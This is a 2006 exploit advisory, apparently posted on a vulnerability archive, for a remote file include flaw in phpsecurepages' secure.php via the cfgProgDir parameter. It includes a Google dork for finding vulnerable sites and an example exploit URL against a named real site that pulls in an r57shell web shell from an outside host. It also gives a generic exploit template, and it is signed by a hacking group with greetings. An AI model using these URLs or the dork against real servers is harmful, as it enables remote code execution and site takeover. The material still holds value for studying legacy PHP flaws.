phpsecurepages (cfgProgDir) Remote File Include Vulnerability

2006-09-29T00:00:00
ID SECURITYVULNS:DOC:14502
Type securityvulns
Reporter Securityvulns
Modified 2006-09-29T00:00:00

Description

==============================================================================================

phpsecurepages (cfgProgDir) Remote File Include Vulnerability

===============================================================================================

Critical Level : Dangerous

Download from : http://www.comscripts.com/jump.php?action=script&id=1491

Version : all versions

================================================================================================

Google Dork : inurl:"phpsecurepages"

================================================================================================

Bug in : /phpSecurePages/secure.php

Vlu Code :

--------------------------------

include($cfgProgDir . "lng/" . $languageFile);

include($cfgProgDir . "session.php");

example:http://www.teilar.gr/services/noc/admin/phpSecurePages/secure.php?cfgProgDir=http://d4wood.by.ru/r57shell.php?

================================================================================================

Exploit :

--------------------------------

http://sitename.com/[Script Path]/secure.php?cfgProgDir==http://sheller.com?

================================================================================================

Discoverd By : D_7J

Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)

Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net

Special Thx To : Str0ke

Greetz: All Iranian Hackers

==================================================================================================